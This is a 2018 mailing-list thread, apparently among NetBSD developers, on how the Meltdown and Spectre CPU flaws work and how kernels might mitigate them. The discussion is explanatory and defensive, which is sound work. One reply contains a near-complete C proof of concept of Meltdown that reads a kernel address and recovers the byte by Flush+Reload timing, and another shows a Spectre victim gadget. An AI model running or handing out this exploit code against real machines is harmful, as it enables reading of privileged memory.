Re: meltdown

2018-01-06 Thread Michael
Hello,

On Sat, 6 Jan 2018 07:33:50 +
m...@netbsd.org wrote:

> Loongson-2 had an issue where from branch prediction it would prefetch
> instructions from the I/O area and deadlock.
> 
> This happened in normal usage so we build the kernel with a binutils
> flag to output different jumps and flush the BTB on kernel entry.*

I remember when we added support for those flags to our gcc & binutils.

> I wouldn't count on MIPS CPUs to hold under the same level of scrutiny
> as x86 CPUs, luckily they're pretty obscure (and most probably aren't
> speculative).

Yeah, I doubt there are a lot of IRIX servers left, and embedded MIPS
is probably safe ;)

have fun
Michael


Re: meltdown

2018-01-06 Thread Paul.Koning


> On Jan 5, 2018, at 8:55 PM, Thor Lancelot Simon  wrote:
> 
> On Thu, Jan 04, 2018 at 04:58:30PM -0500, Mouse wrote:
>>> As I understand it, on intel cpus and possibly more, we'll need to
>>> unmap the kernel on userret, or else userland can read arbitrary
>>> kernel memory.
>> 
>> "Possibly more"?  Anything that does speculative execution needs a good
>> hard look, and that's damn near everything these days.
> 
> I wonder about just "these days".  The potential for this kind of problem
> goes all the way back to STRETCH or the 6600, doesn't it?  If they had
> memory permissions, which I frankly don't know.  And even in microprocessors
> it's got to go back to... the end of the 1980s (R6000?) certainly the 1990s.

No, the issue here isn't permissions, the issue is speculative execution
that leaves observable side effects (such as the existence of cache entries)
after the speculative path is abandoned.  And in the case of Meltdown (though
not Spectre) it also requires that the speculatively issued load skip the
access permission check.

CDC 6600 has memory relocation, but not permissions, and in any case it
does not have speculative execution of any type.  It does have multiple
issue, of course, but that alone is not sufficient to create the 
vulnerability.

> Though of course "fail early" is an obvious principle to security types,
> given the cost of aborting work in progress I can easily see the
> opposite being true for CPU designers (I'm not one, so I don't really
> know).  Which idiom (check permissions, then speculate / speculate, then
> check permissions) is more common?

Clearly it depends on the design, either on what's straightforward or 
efficient to do, or on what is considered essential by the particular
designers involved.

Presumably (one hopes) the result of the current work is that design
techniques will change.  And especially, that a better and wider understanding
of side channel attacks will appear.

Side channel attacks can be quite strange and esoteric.  They are worth
reading about.  My favorite is one I read a year or so ago, a paper
describing capturing the sound made by the electronics inside a cell phone
as it was performing an RSA crypto operation.  This allowed the attacker
to reconstruct the RSA secret key without having to install any special
software in the phone, and without having to tamper with the phone physically
in any way.

paul


Re: meltdown

2018-01-06 Thread Mouse
>> Though of course "fail early" is an obvious principle to security
>> types, given the cost of aborting work in progress I can easily see
>> the opposite being true for CPU designers (I'm not one, so I don't
>> really know).  Which idiom (check permissions, then speculate /
>> speculate, then check permissions) is more common?
> No idea; one would think that failing early in order to avoid
> unnecessary resource usage would be useful.

Perhaps, but _not_ failing is a win if it turns out the spec ex is
confirmed instead of annulled.  And if the silicon would be sitting
idle otherwise, the only resource used is power.  (And die area, but
that's used in a static sense, not a dynamic sense.)

> Then again, the problem seems to be that not everything from the
> speculative path gets canceled / annulled, not so much that the
> speculation took place.

I agree.  For cache issues...it might be useful to freeze spec ex on a
cache miss.  Go ahead and service the cache miss, but keep the result
in a separate cache line, not part of the normal cache.  On annullment,
just drop it; on confirmation, push it into the normal cache and
unfreeze.  If you want to get really fancy, have multiple speculative
cache lines, kind of a small cache in front of the regular cache purely
for speculative use, and don't freeze speculation unless it fills up.
Though the spectre (ha ha) of coherency then raises its ugly head.
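
Roughly, as a toy software model of that bookkeeping (sizes and names are
invented, coherency is ignored entirely, and this says nothing about how
real hardware would actually do it):

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define NORMAL_LINES 64   /* pretend direct-mapped cache */
#define SPEC_SLOTS    4   /* small buffer sitting in front of it */

struct line { uintptr_t tag; bool valid; };

struct line normal_cache[NORMAL_LINES];
struct line spec_buf[SPEC_SLOTS];

/* A speculative miss fills a side slot instead of the normal array.
 * Returns false when the buffer is full -- the point at which
 * speculation itself would have to stall. */
bool spec_fill(uintptr_t tag)
{
    for (size_t i = 0; i < SPEC_SLOTS; i++) {
        if (!spec_buf[i].valid) {
            spec_buf[i].tag = tag;
            spec_buf[i].valid = true;
            return true;
        }
    }
    return false;                /* buffer full: freeze speculation */
}

/* Annulment: drop everything; the normal cache never saw the
 * abandoned path, so it leaves no footprint there. */
void spec_annul(void)
{
    for (size_t i = 0; i < SPEC_SLOTS; i++)
        spec_buf[i].valid = false;
}

/* Confirmation: only now do the fills become visible in the normal cache. */
void spec_commit(void)
{
    for (size_t i = 0; i < SPEC_SLOTS; i++) {
        if (spec_buf[i].valid) {
            normal_cache[spec_buf[i].tag % NORMAL_LINES] = spec_buf[i];
            spec_buf[i].valid = false;
        }
    }
}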

Does anyone know how the typical time to service a cache miss compares
with the typical time to determine whether spec ex is annulled or
confirmed?  If the former is longer, or at least not much shorter, than
the latter, then this wouldn't even impair performance much in the miss
case.

Of course, this wouldn't do anything about covert channels other than
the cache.  But it'd stop anything using the cache for a covert channel
between spec ex and mainline code cold (meltdown and some variants of
spectre).  It's only a partial fix, but, for most purposes, that's
better than no fix.

Of course, some of the covert channels touched on in the spectre paper
are not fixable, such as power consumption and EMI generation;
fortunately, they are significantly harder to read from software.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTML    mo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread maya
On Sat, Jan 06, 2018 at 01:41:38AM -0500, Michael wrote:
> R10k had all sorts of weirdo speculative execution related problems
> ( see hardware workarounds in the O2 ), and I doubt it's the first to
> implement it.

Loongson-2 had an issue where from branch prediction it would prefetch
instructions from the I/O area and deadlock.

This happened in normal usage so we build the kernel with a binutils
flag to output different jumps and flush the BTB on kernel entry.*

I wouldn't count on MIPS CPUs to hold under the same level of scrutiny
as x86 CPUs, luckily they're pretty obscure (and most probably aren't
speculative).

* https://sourceware.org/ml/binutils/2009-11/msg00387.html


Re: meltdown

2018-01-05 Thread Michael
Hello,

On Fri, 5 Jan 2018 20:55:19 -0500
Thor Lancelot Simon  wrote:

> On Thu, Jan 04, 2018 at 04:58:30PM -0500, Mouse wrote:
> > > As I understand it, on intel cpus and possibly more, we'll need to
> > > unmap the kernel on userret, or else userland can read arbitrary
> > > kernel memory.  
> > 
> > "Possibly more"?  Anything that does speculative execution needs a good
> > hard look, and that's damn near everything these days.  
> 
> I wonder about just "these days".  The potential for this kind of problem
> goes all the way back to STRETCH or the 6600, doesn't it?  If they had
> memory permissions, which I frankly don't know.  And even in microprocessors
> it's got to go back to... the end of the 1980s (R6000?) certainly the 1990s.

R10k had all sorts of weirdo speculative execution related problems
( see hardware workarounds in the O2 ), and I doubt it's the first to
implement it.

> Though of course "fail early" is an obvious principle to security types,
> given the cost of aborting work in progress I can easily see the
> opposite being true for CPU designers (I'm not one, so I don't really
> know).  Which idiom (check permissions, then speculate / speculate, then
> check permissions) is more common?

No idea; one would think that failing early in order to avoid
unnecessary resource usage would be useful. Then again, the problem
seems to be that not everything from the speculative path gets
canceled / annulled, not so much that the speculation took place.

have fun
Michael


Re: meltdown

2018-01-05 Thread Mouse
>> "Possibly more"?  Anything that does speculative execution needs a
>> good hard look, and that's damn near everything these days.
> I wonder about just "these days".  The potential for this kind of
> problem goes all the way back to STRETCH or the 6600, doesn't it?

I don't know; I don't know enough about either.

> Though of course "fail early" is an obvious principle to security
> types, given the cost of aborting work in progress I can easily see
> the opposite being true for CPU designers

I think it's less the cost of aborting work in progress and more the
(performance) cost of not keeping silicon busy all the time.

> (I'm not one, so I don't really know).

Me neither.  But it seems passing obvious to me that these hardware
bugs were at least partially driven by customer demand for performance.
And, to be sure, there are workloads for which neither meltdown nor
spectre is a significant risk, even if the hardware is vulnerable.

> Which idiom (check permissions, then speculate / speculate, then
> check permissions) is more common?

I don't know.  But the problem is only partially when permissions get
checked.  Consider spectre used by sandboxed code to read outside the
sandbox within a single process; this is doing nothing that, from the
hardware point of view, would violate permissions.  I could easily see
a CPU designer saying "So what's the problem if the code can read that
memory?  It can read it anytime it wants with a simple load anyway.".
The problem is also failure to roll back _all_ side effects when
annulling speculative execution.  (To be sure, even if that were done
it wouldn't fix quite the whole problem; closing one side-channel
doesn't necessarily close other side-channels.  But it would help.)

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTML    mo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread Thor Lancelot Simon
On Thu, Jan 04, 2018 at 04:58:30PM -0500, Mouse wrote:
> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.

I wonder about just "these days".  The potential for this kind of problem
goes all the way back to STRETCH or the 6600, doesn't it?  If they had
memory permissions, which I frankly don't know.  And even in microprocessors
it's got to go back to... the end of the 1980s (R6000?) certainly the 1990s.

Though of course "fail early" is an obvious principle to security types,
given the cost of aborting work in progress I can easily see the
opposite being true for CPU designers (I'm not one, so I don't really
know).  Which idiom (check permissions, then speculate / speculate, then
check permissions) is more common?

Thor


Re: meltdown

2018-01-05 Thread Ted Lemon
On Jan 5, 2018, at 8:52 AM,   wrote:
> so the illegal read is also speculative, and is voided (exception
> and all) when the wrong branch prediction is sorted out. But it
> looks like the paper is saying that refinement has not been
> demonstrated, though such branch prediction hacks have been shown
> in other exploits.  Still, if that can be done, a test for
> "SEGV too often" is no help.

Actually, the javascript exploit works exactly in this way.   Sigh.



RE: meltdown

2018-01-05 Thread Terry Moore
> I think you are confusing spectre and meltdown.

 

Yes, my apologies.

--Terry



Re: meltdown

2018-01-05 Thread Paul.Koning


> On Jan 4, 2018, at 6:01 PM, Warner Losh  wrote:
> 
> 
> 
> On Thu, Jan 4, 2018 at 2:58 PM, Mouse  wrote:
> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
> 
> > Also, I understand that to exploit this, one has to attempt to access
> > kernel memory a lot, and SEGV at least once per bit.
> 
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
> 
> Nowhere in there is a SEGV generated.
> 
> That's the meltdown stuff.  Spectre targets other things (I've seen
> branch prediction mentioned) to leak information around protection
> barriers.
> 
> I think you are confusing spectre and meltdown.
> 
> meltdown requires a sequence like:
> 
> exception (*0 = 0 or a = 1 / 0);
> do speculative read
> 
> to force a trip into kernel land just before the speculative read so that 
> otherwise not readable stuff gets (or does not get) read into cache which can 
> then be probed for data.

No, that's not correct.  You were being misled by the "Toy example".
The toy example demonstrates that speculative operations are done
after the point in the code that generates an exception, but in
itself it is NOT the exploit.

The exploit has the form:

x = read(secret_memory_location);
touch (cacheline[x]);
while (1) ;

The first line will SEGV, of course, but in the vulnerable CPUs
the speculative load is issued before that happens.  And also before
the SEGV happens, cacheline[x] is touched, making that line resident
in the cache.  This "transmits to the side channel".

Next, the SEGV happens.  The exploit catches that, and then it
does a timing test on references to cacheline[i] to see which i is
now resident.  That i is the value  of x.
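
Spelled out a little further, a rough C sketch of that structure (unverified,
assuming gcc or clang on x86 with <x86intrin.h>; the target address and the
100-cycle threshold are invented, and KAISER or a non-vulnerable CPU will of
course make it recover nothing):

#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>        /* _mm_clflush, __rdtscp */

#define STRIDE 4096           /* one page per byte value, to dodge the prefetcher */

static uint8_t probe[256 * STRIDE];
static sigjmp_buf env;

static void on_segv(int sig)
{
    (void)sig;
    siglongjmp(env, 1);       /* "the exploit catches that" */
}

/* Time one load; a fast load means the line was already resident. */
static uint64_t access_time(volatile uint8_t *p)
{
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
}

int main(void)
{
    /* Hypothetical target: some kernel virtual address of interest. */
    volatile uint8_t *secret = (volatile uint8_t *)0xffffffff80000000UL;
    int i;

    signal(SIGSEGV, on_segv);
    memset(probe, 1, sizeof(probe));
    for (i = 0; i < 256; i++)
        _mm_clflush(&probe[i * STRIDE]);

    if (sigsetjmp(env, 1) == 0) {
        /* Architecturally this load faults, but on affected CPUs it is
         * issued speculatively, and the dependent access below drags
         * probe[x * STRIDE] into the cache before the fault lands. */
        uint8_t x = *secret;
        (void)*(volatile uint8_t *)&probe[x * STRIDE];
    }

    /* Receive side: time each candidate line (Flush+Reload). */
    for (i = 0; i < 256; i++)
        if (access_time(&probe[i * STRIDE]) < 100)
            printf("leaked byte candidate: 0x%02x\n", i);
    return 0;
}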

As the paper points out, it would be possible in principle to prefix
the exploit with

if (false) // predict_true

so the illegal read is also speculative, and is voided (exception
and all) when the wrong branch prediction is sorted out. But it
looks like the paper is saying that refinement has not been
demonstrated, though such branch prediction hacks have been shown
in other exploits.  Still, if that can be done, a test for
"SEGV too often" is no help.

The Meltdown paper clearly says that the KAISER fix cures this
vulnerability.  And while it doesn't say so, it is also clear that
the problem does not exist on CPUs where speculative memory references
do page protection checks.

All the above applies to Meltdown.  Spectre is unrelated in its
core mechanism.  The fact that both eventually end up using side
channels and were published at the same time seems to have caused
some confusion between the two.  It is important to understand they
are independent, stem from different underlying problems, apply
to a different set of vulnerable chips, and have different cures.

paul



Re: meltdown

2018-01-05 Thread Mouse
> If there's anything this issue showed, it's that we definitely need
> fewer people independently considering the issue and openly
> discussing their own (occasionally wrong) suggestions.

Actually, it seems to me we need more.  More minds looking at it, more
discussion of the various ramifications and workarounds.  Lack of
public discussion serves nobody at this point, possibly excepting
chip-makers trying to downplay their bugs.  The hardware bugs behind
these (that speculative execution doesn't make security checks
correctly and doesn't roll back all its side effects when annulled) are
so ubiquitous that the _correct_ fix - buying non-buggy hardware - is
close to impossible.  The only thing most people can do is try to find
workarounds.

I feel reasonably sure that, at this point, there are at least a few
exploitable side-channels and a few workarounds that aren't known
publicly (possibly at all), and more people thinking about them is the
only thing likely to fix that.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTML    mo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread Piotr Meyer
On Fri, Jan 05, 2018 at 02:48:11AM -0600, Dave Huang wrote:
> On Jan 4, 2018, at 15:22, Phil Nelson  wrote:
> > How about turning on the workaround for any process that ignores
> > or catches SEGV.  Any process that is terminated by a SEGV should
> > be safe, shouldn't it?
> 
> Isn't there a suggested mitigation? Seems to me NetBSD should implement 
> it as suggested, rather than coming up with its own special criteria 
> for when to enable the workaround.

BTW: latest summary below:

https://security.googleblog.com/2018/01/more-details-about-mitigations-for-cpu_4.html

https://www.theregister.co.uk/2018/01/05/spectre_flaws_explained/

Regards,
-- 
Piotr 'aniou' Meyer


Re: meltdown

2018-01-05 Thread maya
If there's anything this issue showed, it's that we definitely need fewer
people independently considering the issue and openly discussing their
own (occasionally wrong) suggestions.

It was just a suggestion, I'm not a source of authority.


Re: meltdown

2018-01-05 Thread Dave Huang
On Jan 4, 2018, at 15:22, Phil Nelson  wrote:
> How about turning on the workaround for any process that ignores
> or catches SEGV.  Any process that is terminated by a SEGV should
> be safe, shouldn't it?

Isn't there a suggested mitigation? Seems to me NetBSD should implement 
it as suggested, rather than coming up with its own special criteria 
for when to enable the workaround.
-- 
Name: Dave Huang |  Mammal, mammal / their names are called /
INet: k...@azeotrope.org |  they raise a paw / the bat, the cat /
Telegram: @DahanC |  dolphin and dog / koala bear and hog -- TMBG
Dahan: Hani G Y+C 42 Y++ L+++ W- C++ T++ A+ E+ S++ V++ F- Q+++ P+ B+ PA+ PL++



Re: meltdown

2018-01-05 Thread Phil Nelson
On Thursday 04 January 2018 12:49:22 m...@netbsd.org wrote:
> I wonder if we can count the number of SEGVs and if we get a few, turn
> on the workaround? 

How about turning on the workaround for any process that ignores
or catches SEGV.  Any process that is terminated by a SEGV should
be safe, shouldn't it?

--Phil

-- 
Phil Nelson, http://pcnelson.net



Re: meltdown

2018-01-05 Thread Warner Losh
On Thu, Jan 4, 2018 at 2:58 PM, Mouse  wrote:

> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
>
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
>
> > Also, I understand that to exploit this, one has to attempt to access
> > kernel memory a lot, and SEGV at least once per bit.
>
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
>
> Nowhere in there is a SEGV generated.
>
> That's the meltdown stuff.  Spectre targets other things (I've seen
> branch prediction mentioned) to leak information around protection
> barriers.
>

I think you are confusing spectre and meltdown.

meltdown requires a sequence like:

exception (*0 = 0 or a = 1 / 0);
do speculative read

to force a trip into kernel land just before the speculative read so that
otherwise not readable stuff gets (or does not get) read into cache which
can then be probed for data.

spectre requires  a trip into the kernel to force execution of

if (from-userland < boundary) { array[from-userland] 
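
Fleshed out, the usual shape of that bounds-check-bypass victim is roughly
the following (a sketch with invented names array1/array2, not code lifted
from the papers):

#include <stdint.h>

uint8_t array1[16];
uint8_t array2[256 * 4096];
volatile unsigned int array1_size = 16;

void victim(unsigned int from_userland)
{
    if (from_userland < array1_size) {
        /* Once the predictor has been trained with in-bounds indexes,
         * this body also runs speculatively for out-of-bounds values,
         * and the dependent load leaves a cache footprint that encodes
         * array1[from_userland]. */
        (void)*(volatile uint8_t *)&array2[array1[from_userland] * 4096];
    }
}

The attacker then recovers the byte the same way as in the Meltdown case,
by timing accesses to array2.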

RE: meltdown

2018-01-04 Thread Terry Moore
> As I understand it, on intel cpus and possibly more, we'll need to unmap
> the kernel on userret, or else userland can read arbitrary kernel
> memory.
>
> People seem to be mentioning a 50% performance penalty and we might do
> worse (we don't have vDSOs...)

I suggest sticking to the original papers which are at meltdownattack.com:

https://meltdownattack.com/meltdown.pdf
and 
https://spectreattack.com/spectre.pdf

The problems are fairly subtle.

They demonstrated (in the Meltdown paper) that you can use JIT compiled code
(they used JavaScript in Chrome) to read anything in the Chrome processes'
memory. The kernel memory exploit is troubling, but actually easier to
mitigate. It looks relatively *easier* to mitigate the kernel/user
separation problem.  I think more thought needs to go into how this affects
sandboxing approaches (JIT, interpreters, Docker, XEN, etc). JIT, docker,
Xen are all mentioned as having difficulties.

If I understand the paper correctly, the K/U space unmapping must be
accompanied on x86 (32/64) by KASLR; otherwise the things that must always
be mapped in U space (trap handlers, etc.) can be used to get access anyway.

I don't think you need to SEGV to get this data - the SEGVs can be on the
speculative ("predicted taken") branch path, but the branch is not actually
taken, so the SEGV never gets reported. However, the cache state is changed
by the speculative path.
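
In other words, something with roughly this shape (placeholders only:
'condition' is trained so the predictor guesses taken even though it is
false at runtime, and 'secret' and 'probe' are as in the usual examples):

#include <stdint.h>

void shielded_read(volatile int condition, volatile uint8_t *secret,
                   uint8_t *probe)
{
    if (condition) {                  /* predicted taken, actually 0 */
        uint8_t x = *secret;          /* never retires, so no SEGV is delivered */
        (void)*(volatile uint8_t *)&probe[x * 4096];  /* but may still warm the cache */
    }
}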

But really: we all need to read the primary papers, and not pay too much
attention to the press about this; the press discussion is not really
very helpful (at least as of this morning EDT).

--Terry



Re: meltdown

2018-01-04 Thread Paul.Koning


> On Jan 4, 2018, at 4:58 PM, Mouse  wrote:
> 
>> As I understand it, on intel cpus and possibly more, we'll need to
>> unmap the kernel on userret, or else userland can read arbitrary
>> kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
> 
>> Also, I understand that to exploit this, one has to attempt to access
>> kernel memory a lot, and SEGV at least once per bit.
> 
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
> 
> Nowhere in there is a SEGV generated.

That depends.  The straightforward case of Meltdown starts with an
illegal load, which the CPU will execute anyway speculatively, resulting
in downstream code execution that can be used to change the cache state.
In that form, the load eventually aborts.

There's a discussion in the paper that the load could be preceded by
a branch not taken that's predicted taken.  If so, the SEGV would indeed
not happen, but it isn't clear how feasible this is.

In any case, the problem would not occur in any CPU that does protection
checks prior to issuing speculative memory references.  

paul



Re: meltdown

2018-01-04 Thread Mouse
> As I understand it, on intel cpus and possibly more, we'll need to
> unmap the kernel on userret, or else userland can read arbitrary
> kernel memory.

"Possibly more"?  Anything that does speculative execution needs a good
hard look, and that's damn near everything these days.

> Also, I understand that to exploit this, one has to attempt to access
> kernel memory a lot, and SEGV at least once per bit.

I don't think so.  Traps that would be taken during normal execution
are not taken during speculative execution.  The problem is, to quote
one writeup I found, "Intel CPUs are allowed to access kernel memory
when performing speculative execution, even when the application in
question is running in user memory space.  The CPU does check to see if
an invalid memory access occurs, but it performs the check after
speculative execution, not before.".  This means that things like cache
line loads can occur based on values the currently executing process
should not be able to access; timing access to data that cache-collides
with the cache lines of interest reveals the leaked bit(s).

Nowhere in there is a SEGV generated.

That's the meltdown stuff.  Spectre targets other things (I've seen
branch prediction mentioned) to leak information around protection
barriers.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTML    mo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-04 Thread maya
On Thu, Jan 04, 2018 at 10:01:34PM +0100, Kamil Rytarowski wrote:
> We have: PaX Segvguard. Can we mitigate it with this feature?
> 

that's what gave me the idea, but I think segvguard is per-binary, and I
could just make new binaries to keep on attacking the kernel.


Re: meltdown

2018-01-04 Thread Kamil Rytarowski
On 04.01.2018 21:49, m...@netbsd.org wrote:
> Also, I understand that to exploit this, one has to attempt to access
> kernel memory a lot, and SEGV at least once per bit.
> 
> I wonder if we can count the number of SEGVs and if we get a few, turn
> on the workaround? that would at least spare us the performance penalty
> for normal code.
> 

We have: PaX Segvguard. Can we mitigate it with this feature?


